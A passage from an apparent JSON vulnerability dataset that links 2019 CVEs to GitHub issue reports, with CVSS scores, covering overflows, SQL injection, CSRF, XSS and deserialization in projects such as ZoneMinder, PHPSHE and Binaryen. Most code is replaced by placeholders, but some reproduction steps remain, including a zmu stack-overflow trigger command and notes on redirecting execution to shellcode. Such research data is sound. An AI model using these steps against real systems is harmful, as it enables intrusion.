  43195. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43196. "severity": "CRITICAL",
  43197. "baseScore": 9.8,
  43198. "impactScore": 5.9,
  43199. "exploitabilityScore": 3.9
  43200. },
  43201. {
  43202. "CVE_ID": "CVE-2019-6498",
  43203. "Issue_Url_old": "https://github.com/labapart/gattlib/issues/82",
  43204. "Issue_Url_new": "https://github.com/labapart/gattlib/issues/82",
  43205. "Repo_new": "labapart/gattlib",
  43206. "Issue_Created_At": "2019-01-20T07:45:43Z",
  43207. "description": "stack based bufferoverflow. Hi Team, Summary While fuzzing gattlib using clang NUMBERTAG with ASAN and a stack based buffer overflow was observed in FILETAG and FILETAG Vulnerable code from gattlib.c CODETAG Vulnerable code from notification.c CODETAG Also, I have figured a simple way to reproduce this rather than using AFL poc in this case. APITAG ERRORTAG notification` in this case.",
  43208. "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43209. "severity": "HIGH",
  43210. "baseScore": 8.8,
  43211. "impactScore": 5.9,
  43212. "exploitabilityScore": 2.8
  43213. },
  43214. {
  43215. "CVE_ID": "CVE-2019-6498",
  43216. "Issue_Url_old": "https://github.com/labapart/gattlib/issues/81",
  43217. "Issue_Url_new": "https://github.com/labapart/gattlib/issues/81",
  43218. "Repo_new": "labapart/gattlib",
  43219. "Issue_Created_At": "2019-01-20T07:33:47Z",
  43220. "description": "stack based bufferoverflow. Hi Team, Summary While fuzzing gattlib using clang NUMBERTAG with ASAN and a stack based buffer overflow was observed in FILETAG and FILETAG Vulnerable code from gattlib.c CODETAG Vulnerable code from discover.c CODETAG Also, I have figured a simple way to reproduce this rather than using AFL poc in this case. APITAG ASAN ERRORTAG I have also written a quick MSF module for this specifically the APITAG part CODETAG In addition memory leak was also observed in this case. ERRORTAG OR to verify, APITAG Request team to have a look and validate.",
  43221. "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43222. "severity": "HIGH",
  43223. "baseScore": 8.8,
  43224. "impactScore": 5.9,
  43225. "exploitabilityScore": 2.8
  43226. },
  43227. {
  43228. "CVE_ID": "CVE-2019-6502",
  43229. "Issue_Url_old": "https://github.com/OpenSC/OpenSC/issues/1586",
  43230. "Issue_Url_new": "https://github.com/opensc/opensc/issues/1586",
  43231. "Repo_new": "opensc/opensc",
  43232. "Issue_Created_At": "2019-01-20T17:08:17Z",
  43233. "description": "Memory leak. Hi Team, I have build this repo using clang via ASAN, a memory leak was detected in APITAG ASAN ERRORTAG eidenv.c ERRORTAG",
  43234. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  43235. "severity": "HIGH",
  43236. "baseScore": 7.5,
  43237. "impactScore": 3.6,
  43238. "exploitabilityScore": 3.9
  43239. },
  43240. {
  43241. "CVE_ID": "CVE-2019-6503",
  43242. "Issue_Url_old": "https://github.com/chatopera/cosin/issues/177",
  43243. "Issue_Url_new": "https://github.com/cskefu/cskefu/issues/177",
  43244. "Repo_new": "cskefu/cskefu",
  43245. "Issue_Created_At": "2019-01-22T03:49:20Z",
  43246. "description": "\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e. \u63cf\u8ff0 APITAG \u73b0\u5728\u884c\u4e3a APITAG FILETAG \u8ddf\u8fdb\u8be5\u65b9\u6cd5\u4e2d\uff0c\u53d1\u73b0\u76f4\u63a5\u5bf9\u6587\u4ef6\u5185\u5bb9\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u64cd\u4f5c FILETAG \u9884\u671f\u884c\u4e3a \u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u4e0a\u4f20\u6076\u610f\u6784\u9020\u7684\u6587\u4ef6\uff0c\u5728\u670d\u52a1\u5668\u4e0a\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002 \u89e3\u51b3\u65b9\u6848 \u767d\u540d\u5355 \u73af\u5883 \u4ee3\u7801\u7248\u672c: Git commit hash ( APITAG )",
  43247. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43248. "severity": "CRITICAL",
  43249. "baseScore": 9.8,
  43250. "impactScore": 5.9,
  43251. "exploitabilityScore": 3.9
  43252. },
  43253. {
  43254. "CVE_ID": "CVE-2019-6507",
  43255. "Issue_Url_old": "https://github.com/creditease-sec/insight/issues/42",
  43256. "Issue_Url_new": "https://github.com/creditease-sec/insight/issues/42",
  43257. "Repo_new": "creditease-sec/insight",
  43258. "Issue_Created_At": "2019-01-22T13:59:31Z",
  43259. "description": "There are four CSRF vulnerability that can delete user and etc. vulnerability file: FILETAG NUMBERTAG line NUMBERTAG ERRORTAG NUMBERTAG line NUMBERTAG CODETAG NUMBERTAG line NUMBERTAG ERRORTAG NUMBERTAG line NUMBERTAG ERRORTAG poc NUMBERTAG Post one drops or comment contains this APITAG NUMBERTAG Wait admin to login and access the APITAG admin query the img , one user will be deleted.",
  43260. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  43261. "severity": "HIGH",
  43262. "baseScore": 8.8,
  43263. "impactScore": 5.9,
  43264. "exploitabilityScore": 2.8
  43265. },
  43266. {
  43267. "CVE_ID": "CVE-2019-6707",
  43268. "Issue_Url_old": "https://github.com/kk98kk0/exploit/issues/1",
  43269. "Issue_Url_new": "https://github.com/kk98kk0/exploit/issues/1",
  43270. "Repo_new": "kk98kk0/exploit",
  43271. "Issue_Created_At": "2019-01-03T12:49:43Z",
  43272. "description": "PHPSHE NUMBERTAG FILETAG APITAG Vulnerability. APITAG describes Detection object NUMBERTAG website name: PHPSHE CMS system NUMBERTAG website domain name: FILETAG NUMBERTAG the IP address: FILETAG NUMBERTAG ersion: PHPSHE B2C system NUMBERTAG build NUMBERTAG UTF8) Detection time: January NUMBERTAG Description of vulnerability: Lingbao APITAG network technology co., LTD. PHPSHE CMS system SQL injection vulnerability NUMBERTAG POC and verification Local construction environment NUMBERTAG download PHPSHE NUMBERTAG mall system at FILETAG NUMBERTAG the background to FILETAG the user/password is admin/admin NUMBERTAG erify by the following POC verification methods. Vulnerability injection point: CODETAG vulnerability verification: APITAG NUMBERTAG TXT file contents: CODETAG FILETAG current user: 'root APITAG Code audit: Setup the environment locally. APITAG Line NUMBERTAG of FILETAG enters the FILETAG logic after the submission. FILETAG NUMBERTAG Pe_update function updates the database product=product APITAG FILETAG NUMBERTAG Pe_update function calls _dowhere to process conditional statements. FILETAG NUMBERTAG dowhere function Sql splicing. FILETAG NUMBERTAG When sqlwhere statement is returned after splicing, please note that the malicious code has been spliced successfully FILETAG NUMBERTAG Finally, the database was updated successfully FILETAG FILETAG FILETAG",
  43273. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  43274. "severity": "HIGH",
  43275. "baseScore": 7.2,
  43276. "impactScore": 5.9,
  43277. "exploitabilityScore": 1.2
  43278. },
  43279. {
  43280. "CVE_ID": "CVE-2019-6708",
  43281. "Issue_Url_old": "https://github.com/kk98kk0/exploit/issues/2",
  43282. "Issue_Url_new": "https://github.com/kk98kk0/exploit/issues/2",
  43283. "Repo_new": "kk98kk0/exploit",
  43284. "Issue_Created_At": "2019-01-06T12:51:46Z",
  43285. "description": "PHPSHE NUMBERTAG FILETAG APITAG Vulnerability NUMBERTAG ulnerability description Test object NUMBERTAG website: PHPSHE shopping system NUMBERTAG the website domain name: FILETAG NUMBERTAG IP address: FILETAG NUMBERTAG ersion: PHPSHE B2C mall system NUMBERTAG build NUMBERTAG UTF8) Detection time: January NUMBERTAG ulnerability description: Lingbao Jianhao network technology co., LTD. PHPSHE cms system background SQL injection vulnerability. POC and validation Local setup environment NUMBERTAG download PHPSHE NUMBERTAG cms system at FILETAG NUMBERTAG the background to FILETAG the password is admin/admin NUMBERTAG erify by the following POC verification methods. Vulnerability injection point: ERRORTAG Vulnerability verification method: APITAG NUMBERTAG TXT file contents: CODETAG Vulnerability identification FILETAG FILETAG The solution Background avoid parameter splicing. Code audit: Local environment. FILETAG APITAG The FILETAG line NUMBERTAG execution flow introduces the FILETAG line NUMBERTAG pe_selectall function to count the order list. FILETAG The pe_selectall function is defined on line NUMBERTAG of FILETAG . FILETAG The Pe_selectall function handles conditional statements through the _dowhere APITAG sql_selectall function displays the number of transactions per APITAG malicious SQL is spliced in the _dowhere APITAG injection successful. FILETAG",
  43286. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  43287. "severity": "HIGH",
  43288. "baseScore": 7.2,
  43289. "impactScore": 5.9,
  43290. "exploitabilityScore": 1.2
  43291. },
  43292. {
  43293. "CVE_ID": "CVE-2019-6719",
  43294. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/111",
  43295. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/111",
  43296. "Repo_new": "mz-automation/libiec61850",
  43297. "Issue_Created_At": "2019-01-15T11:05:33Z",
  43298. "description": "Heap Use After Free in server_example_goose. Hi Team, There is Heap Use After Free in server_example_goose, Snip FILETAG APITAG Starting server failed! Exit. APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG e NUMBERTAG dcc8 at pc NUMBERTAG d NUMBERTAG bp NUMBERTAG fdf9f6fedc0 sp NUMBERTAG fdf9f6fedb0 READ of size NUMBERTAG at NUMBERTAG e NUMBERTAG dcc8 thread T NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG dffe in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG c in APITAG PATHTAG NUMBERTAG adbb in APITAG PATHTAG NUMBERTAG dea5 in APITAG PATHTAG NUMBERTAG fdfa NUMBERTAG b6b9 in start_thread ( PATHTAG NUMBERTAG fdfa NUMBERTAG b NUMBERTAG c in clone ( PATHTAG NUMBERTAG e NUMBERTAG dcc8 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG fdfa2b NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG e NUMBERTAG in Memory_free PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG dc7 in APITAG PATHTAG NUMBERTAG aa3a in APITAG PATHTAG NUMBERTAG b in main PATHTAG NUMBERTAG fdfa NUMBERTAG ca NUMBERTAG f in __libc_start_main ( PATHTAG ) previously allocated by thread T0 here NUMBERTAG fdfa2b NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG e NUMBERTAG e in Memory_calloc PATHTAG NUMBERTAG da7f in APITAG PATHTAG NUMBERTAG ea8 in APITAG PATHTAG NUMBERTAG a NUMBERTAG e in APITAG PATHTAG NUMBERTAG a NUMBERTAG d in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fdfa NUMBERTAG ca NUMBERTAG f in __libc_start_main ( PATHTAG ) Thread T1 created by T0 here NUMBERTAG fdfa2ac NUMBERTAG in pthread_create ( PATHTAG NUMBERTAG df2e in Thread_start PATHTAG NUMBERTAG af4f in APITAG PATHTAG NUMBERTAG b4 in main PATHTAG NUMBERTAG fdfa NUMBERTAG ca NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap use after free PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fd[fd]fd fd fd fd fd fd NUMBERTAG c1c7fff9ba0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa NUMBERTAG c1c7fff9bb0: fa fa fa fa NUMBERTAG c1c7fff9bc NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9bd NUMBERTAG c1c7fff9be NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  43299. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  43300. "severity": "HIGH",
  43301. "baseScore": 7.5,
  43302. "impactScore": 3.6,
  43303. "exploitabilityScore": 3.9
  43304. },
  43305. {
  43306. "CVE_ID": "CVE-2019-6777",
  43307. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2436",
  43308. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2436",
  43309. "Repo_new": "zoneminder/zoneminder",
  43310. "Issue_Created_At": "2019-01-23T08:03:50Z",
  43311. "description": "Reflective XSS vulnerability. Describe Your Environment APITAG NUMBERTAG Describe the bug Reflective XSS vulnerability To Reproduce APITAG has one reflective XSS vulnerabilities FILETAG line NUMBERTAG The parameters in the request are accepted at NUMBERTAG lines, and the page is output at NUMBERTAG lines without verification. FILETAG FILETAG Expected behavior The vulnerability mcan lead to user information leakage, unauthorized operation Debug Logs APITAG quotes so they are formatted properly> `",
  43312. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43313. "severity": "MEDIUM",
  43314. "baseScore": 6.1,
  43315. "impactScore": 2.7,
  43316. "exploitabilityScore": 2.8
  43317. },
  43318. {
  43319. "CVE_ID": "CVE-2019-6779",
  43320. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/3",
  43321. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/3",
  43322. "Repo_new": "chshcms/cscms",
  43323. "Issue_Created_At": "2019-01-24T14:51:59Z",
  43324. "description": "There is a CSRF vulnerability that can PATHTAG friend links. just use add friend links for example: After the admin logged in, we can send him a url with these code on that page APITAG CODETAG after he clicked that button, then we can add our malicious link to the friend link: admin page: APITAG homepage: APITAG",
  43325. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
  43326. "severity": "HIGH",
  43327. "baseScore": 8.1,
  43328. "impactScore": 5.2,
  43329. "exploitabilityScore": 2.8
  43330. },
  43331. {
  43332. "CVE_ID": "CVE-2019-6802",
  43333. "Issue_Url_old": "https://github.com/pypiserver/pypiserver/issues/237",
  43334. "Issue_Url_new": "https://github.com/pypiserver/pypiserver/issues/237",
  43335. "Repo_new": "pypiserver/pypiserver",
  43336. "Issue_Created_At": "2019-01-24T17:43:58Z",
  43337. "description": "CRLF injection via new line characters in URI. Summary pypiserver doesn't escape new line characters when redirecting users. I'm not too sure if this is only in the default installation, or that if users used a redirect functionality it would additionally be vulnerable. Steps to Reproduce NUMBERTAG Download pypiserver and host a default installation NUMBERTAG Open URLTAG NUMBERTAG Observe cookie being set Impact Create arbitrary HTTP responses, set malicious cookies, potential for XSS depending on implementation (i.e. location header doesn't redirect to a valid host and therefore displays whatever content is available)",
  43338. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43339. "severity": "MEDIUM",
  43340. "baseScore": 6.1,
  43341. "impactScore": 2.7,
  43342. "exploitabilityScore": 2.8
  43343. },
  43344. {
  43345. "CVE_ID": "CVE-2019-6803",
  43346. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2124",
  43347. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2124",
  43348. "Repo_new": "typora/typora-issues",
  43349. "Issue_Created_At": "2019-01-24T14:38:57Z",
  43350. "description": "Typora XSS to RCE. The filtering rules on the left outline bar are not perfect. When the document has the following content, it will cause XSS\uff0cand then could raise to RCE: eg: APITAG ERRORTAG could execute cmd command. FILETAG the Linux and Mac version has the same problem.",
  43351. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43352. "severity": "MEDIUM",
  43353. "baseScore": 6.1,
  43354. "impactScore": 2.7,
  43355. "exploitabilityScore": 2.8
  43356. },
  43357. {
  43358. "CVE_ID": "CVE-2019-6804",
  43359. "Issue_Url_old": "https://github.com/rundeck/rundeck/issues/4406",
  43360. "Issue_Url_new": "https://github.com/rundeck/rundeck/issues/4406",
  43361. "Repo_new": "rundeck/rundeck",
  43362. "Issue_Created_At": "2019-01-22T21:38:39Z",
  43363. "description": "Security: stored XSS vulnerability. Describe the bug A stored XSS vulnerability exists in the Job Edit page My Rundeck detail Rundeck version NUMBERTAG install type: any To Reproduce (forthcoming)",
  43364. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43365. "severity": "MEDIUM",
  43366. "baseScore": 6.1,
  43367. "impactScore": 2.7,
  43368. "exploitabilityScore": 2.8
  43369. },
  43370. {
  43371. "CVE_ID": "CVE-2019-6966",
  43372. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/361",
  43373. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/361",
  43374. "Repo_new": "axiomatic-systems/bento4",
  43375. "Issue_Created_At": "2019-01-25T07:49:22Z",
  43376. "description": "failed to allocate APITAG in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to failed allocate APITAG in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash3.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG wu.an. EMAILTAG",
  43377. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43378. "severity": "MEDIUM",
  43379. "baseScore": 6.5,
  43380. "impactScore": 3.6,
  43381. "exploitabilityScore": 2.8
  43382. },
  43383. {
  43384. "CVE_ID": "CVE-2019-6978",
  43385. "Issue_Url_old": "https://github.com/libgd/libgd/issues/492",
  43386. "Issue_Url_new": "https://github.com/libgd/libgd/issues/492",
  43387. "Repo_new": "libgd/libgd",
  43388. "Issue_Created_At": "2019-01-15T11:09:33Z",
  43389. "description": "Update APITAG APITAG functions for possible Double free bugs. Hi, please commit the patch file.",
  43390. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43391. "severity": "CRITICAL",
  43392. "baseScore": 9.8,
  43393. "impactScore": 5.9,
  43394. "exploitabilityScore": 3.9
  43395. },
  43396. {
  43397. "CVE_ID": "CVE-2019-6988",
  43398. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1178",
  43399. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1178",
  43400. "Repo_new": "uclouvain/openjpeg",
  43401. "Issue_Created_At": "2019-01-17T14:49:50Z",
  43402. "description": "memory exhauted and hangs long time when use NUMBERTAG bit opj_decompress. I found a problem which will cause memory is exhausted, and program hang for NUMBERTAG minutes. My test server had NUMBERTAG GB of memory. This can cause denial of service. Steps to Reproduce NUMBERTAG Download and unzip FILETAG NUMBERTAG Run APITAG NUMBERTAG When I test it use NUMBERTAG bit opj_decompress with asan, the following is the output information ERRORTAG Analysis NUMBERTAG Alloc too much big memory NUMBERTAG Maybe too many cycles System Configuration version: git commit APITAG Environment: Ubuntu NUMBERTAG TLS Memery Size NUMBERTAG GB component NUMBERTAG bit opj_decompress",
  43403. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43404. "severity": "MEDIUM",
  43405. "baseScore": 6.5,
  43406. "impactScore": 3.6,
  43407. "exploitabilityScore": 2.8
  43408. },
  43409. {
  43410. "CVE_ID": "CVE-2019-6990",
  43411. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2444",
  43412. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2444",
  43413. "Repo_new": "zoneminder/zoneminder",
  43414. "Issue_Created_At": "2019-01-24T18:48:25Z",
  43415. "description": "Stored Self Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug In the view zone , an user can PATHTAG zones. While adding a zone, there exists no input filtration, allowing an attacker to inject unintended values. Later while displaying the zone names on the webpage,there exists no output filtration, leading to Self Stored based XSS. To Reproduce Affected URL : URLTAG Payload used ERRORTAG Navigate to the Affected URL Click on Add a new zone (pop up appears) Add the XSS payload into the NAME field & select any of option from the Type dropdown field & click on save. Navigate back to the Affected URL, payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43416. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  43417. "severity": "MEDIUM",
  43418. "baseScore": 5.4,
  43419. "impactScore": 2.7,
  43420. "exploitabilityScore": 2.3
  43421. },
  43422. {
  43423. "CVE_ID": "CVE-2019-6991",
  43424. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2478",
  43425. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2478",
  43426. "Repo_new": "zoneminder/zoneminder",
  43427. "Issue_Created_At": "2019-01-25T03:16:25Z",
  43428. "description": "Stack based buffer Overflow /src/zm_user.cpp (zmu). Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug A Stack overflows occur when variable size data is copied into fixed length buffers located on the program stack without any bounds checking. Vulnerabilities of this class are generally considered to be of high severity since their exploitation would mostly permit arbitrary code execution or Denial of Service. To Reproduce APITAG Binary_ zmu An attacker can exploit the buffer by smashing the stack and modifying the return address of the function. This can be used to call some other function, like pointing the return address to some custom shellcode, injected into the stack. _In function_: APITAG APITAG function_: APITAG APITAG The vulnerability exists in function APITAG , in APITAG , while authenticating the user. The vulnerability exists in the login functionality. Once a username & password is supplied to the zmu binary, the username & password is passed through APITAG function in order to produce an escaped SQL string. Due to absense of any protection and limitation placed to the length of username & password, there exists a stack based buffer overflow. APITAG code _ APITAG APITAG APITAG APITAG APITAG We need to compile the binary from source, using custom flags, inorder to trigger & debug the vulnerability. APITAG to compile_ mkdir build (In zoneminder directory) cd build cmake .. DCMAKE_C_FLAGS=\" fsanitize=address g O0 fno stack protector\" DCMAKE_CXX_FLAGS=\" fsanitize=address g O0 fno stack protector\" cd src/ APITAG to run_ ./zmu U $(python c \"print 'a NUMBERTAG P admin APITAG Cause Analysis_ Vulnerable function syntax unsigned long APITAG mysql, char to, const char from, unsigned long length) Characters in the from argument are escaped & the result is placed in the to argument, of the length specified, followed by a terminating null byte . As per the Mysql documentation, APITAG string pointed to by from must be length bytes long. You must allocate the to buffer to be at least length NUMBERTAG bytes long. (In the worst case, each character may need to be encoded as using two bytes, and there must be room for the terminating null byte.) When APITAG returns, the contents of to is a null terminated string.\" But as per the current code, the length is calculated form the lenth of the username & password (from) argument & can exceed more than the APITAG & APITAG (to) limit, which is an fixed array (safer_username NUMBERTAG safer_password NUMBERTAG causing stack based buffer overflow. By looking at the comments written in APITAG function APITAG the to argumunt array is calculated based upon the current db username size, which is of NUMBERTAG Following what's said in the documentation (length NUMBERTAG bytes long NUMBERTAG is the limit set for the to argument safer_username (same for safer_password). Ignoring the fact that there's no limit set for the username, password input received to the binary. ERRORTAG APITAG Initially the username & password pointer address remains valid, until it reaches safer_username, populating other pointer addresses with the injected payload. CODETAG ERRORTAG Here we can see, how the pointer address values are populated with the injected values (a's) . Later the code, when the pointer addresses are accessed, segmentation fault is raised due to an invalid memory access. Expected behavior An attacker can Bypass authentication by overwriting the function pointer. It should limit the username limit. Debug Logs None",
  43429. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43430. "severity": "CRITICAL",
  43431. "baseScore": 9.8,
  43432. "impactScore": 5.9,
  43433. "exploitabilityScore": 3.9
  43434. },
  43435. {
  43436. "CVE_ID": "CVE-2019-6992",
  43437. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2445",
  43438. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2445",
  43439. "Repo_new": "zoneminder/zoneminder",
  43440. "Issue_Created_At": "2019-01-24T18:53:08Z",
  43441. "description": "POST (self) Reflected Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view controlcap , displays the Name field APITAG value on the webpage with no proper filtration, leading to POST based self XSS. To Reproduce Affected URL : URLTAG Payload used ERRORTAG Navigate to the Affected URL Add the XSS payload into the NAME field & click on MOVE tab, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43442. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43443. "severity": "MEDIUM",
  43444. "baseScore": 6.1,
  43445. "impactScore": 2.7,
  43446. "exploitabilityScore": 2.8
  43447. },
  43448. {
  43449. "CVE_ID": "CVE-2019-7151",
  43450. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1881",
  43451. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1881",
  43452. "Repo_new": "webassembly/binaryen",
  43453. "Issue_Created_At": "2019-01-20T12:11:54Z",
  43454. "description": "Null pointer Deference in APITAG Hi, there. A Null pointer Deference problem was discovered in APITAG A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"wasm opt $POC\" to reproduce the problem. FILETAG git log: ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
  43455. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43456. "severity": "MEDIUM",
  43457. "baseScore": 6.5,
  43458. "impactScore": 3.6,
  43459. "exploitabilityScore": 2.8
  43460. },
  43461. {
  43462. "CVE_ID": "CVE-2019-7152",
  43463. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1880",
  43464. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1880",
  43465. "Repo_new": "webassembly/binaryen",
  43466. "Issue_Created_At": "2019-01-20T12:07:15Z",
  43467. "description": "A Heap buffer overflow problem was discovered in APITAG int). Hi, there. A Heap buffer overflow problem was discovered in APITAG int). A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"./wasm opt $POC\" to reproduce the error. FILETAG git log: ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
  43468. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43469. "severity": "MEDIUM",
  43470. "baseScore": 6.5,
  43471. "impactScore": 3.6,
  43472. "exploitabilityScore": 2.8
  43473. },
  43474. {
  43475. "CVE_ID": "CVE-2019-7153",
  43476. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1879",
  43477. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1879",
  43478. "Repo_new": "webassembly/binaryen",
  43479. "Issue_Created_At": "2019-01-20T12:02:25Z",
  43480. "description": "Null pointer Deference in APITAG int) in wasm/wasm APITAG Hi, there. A Null pointer Deference problem was discovered in APITAG int) in wasm/wasm APITAG A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"wasm opt $POC\" to reproduce the problem. FILETAG git log ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
  43481. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43482. "severity": "MEDIUM",
  43483. "baseScore": 6.5,
  43484. "impactScore": 3.6,
  43485. "exploitabilityScore": 2.8
  43486. },
  43487. {
  43488. "CVE_ID": "CVE-2019-7154",
  43489. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1876",
  43490. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1876",
  43491. "Repo_new": "webassembly/binaryen",
  43492. "Issue_Created_At": "2019-01-19T07:42:40Z",
  43493. "description": "A Heap buffer overflow problem was discovered in APITAG function in simple_ast.h. Hi, there. A Heap buffer overflow problem was discovered in APITAG function in simple_ast.h in emscripten optimizer, as distributed in Binaryen NUMBERTAG A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"./wasm2js $POC\" to reproduce the error. FILETAG git log: CODETAG The ASAN dumps the stack trace as follows: ERRORTAG",
  43494. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43495. "severity": "MEDIUM",
  43496. "baseScore": 6.5,
  43497. "impactScore": 3.6,
  43498. "exploitabilityScore": 2.8
  43499. },
  43500. {
  43501. "CVE_ID": "CVE-2019-7156",
  43502. "Issue_Url_old": "https://github.com/uvoteam/libdoc/issues/5",
  43503. "Issue_Url_new": "https://github.com/uvoteam/libdoc/issues/5",
  43504. "Repo_new": "uvoteam/libdoc",
  43505. "Issue_Created_At": "2019-01-29T03:14:13Z",
